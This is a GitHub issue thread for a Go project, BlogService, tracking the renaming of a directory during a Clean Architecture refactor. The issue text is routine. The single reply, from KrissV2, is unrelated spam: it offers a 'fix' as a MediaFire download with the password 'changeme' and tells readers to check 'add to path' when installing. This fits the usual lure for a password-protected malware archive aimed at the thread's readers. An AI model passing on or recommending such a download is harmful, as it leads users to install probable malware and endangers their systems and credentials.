### ISSUE TITLE
[Refactoring] Rename the go directory to remake the directory

### ISSUE THREAD

**Issue by Rwatana** [Rwatana/BlogService#24]
### Parent
#23 

### Background
same as parent
### Goal
same as parent

#### Overview
- **What**: Refactor the Go project structure to adhere to Clean Architecture.
- **How**:
  - Analyze the current directory and identify areas that require restructuring.
  - Implement Clean Architecture by separating concerns into distinct layers (e.g., domain, use cases, interface adapters, and frameworks/drivers).

#### Todo
  - [x] Rename the go directory.

### Deadline
9/7
### References
- [Clean Architecture Overview](https://example.com/clean-architecture-overview)
- [Go Project Layout](https://github.com/golang-standards/project-layout)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
